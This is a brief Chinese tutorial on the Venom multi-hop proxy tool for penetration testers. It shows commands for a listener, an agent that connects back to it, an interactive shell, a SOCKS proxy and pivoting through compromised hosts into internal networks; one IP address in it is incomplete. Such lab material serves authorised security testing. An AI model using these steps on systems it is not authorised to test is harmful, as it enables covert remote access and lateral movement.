一、Venom简介:
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具,可将多个节点进行连接,然后以节点为跳板,构建多级代理,渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。
特性:
l可视化网络拓扑
l多级socks5代理
l多级端口转发
l端口复用 (apache/mysql/...)
lssh隧道
l交互式shell
l文件的上传和下载
l节点间通信加密
l支持多种平台(Linux/Windows/MacOS)和多种架构(x86/x64/arm/mips)
二、Venom使用实验:
help(所有支持的功能):
①单层网络环境情况:
1、服务端开启监听:
./admin_linux_x64 -lport 888
2、客户端连接:
agent.exe -rhost 192.168.136.144 -rport 888
3、连接成功就会多出一个node:
goto 1
即可进入到节点已连接的节点:
4、一些内置的功能:
交互式shell:
shell
socks代理:
socks 1080
然后配置服务端ip:1080即可使用socks代理
还有一些其他的功能,看help命令即可,操作也是十分简单的,就不演示了
②多层网络环境:
工具支持以节点为跳板,构建多级代理
网络环境:已经拿到A主机的node,内网中存在B主机,不能出网,只能连接A主机
1、在A主机监听777端口
Listen 777
2、B主机连接A监听的777端口
agent.exe -rhost 192.168.137 -rport 777
可以看到多出了个node2
show
操作作节点2:
goto 2
还有更复杂的网络环境也是类似操作,在能被目标连接的node中监听端口,然后再连接node监听的端口即可完成多层网络代理,并且一台机器的node可以监听多个不同的端口
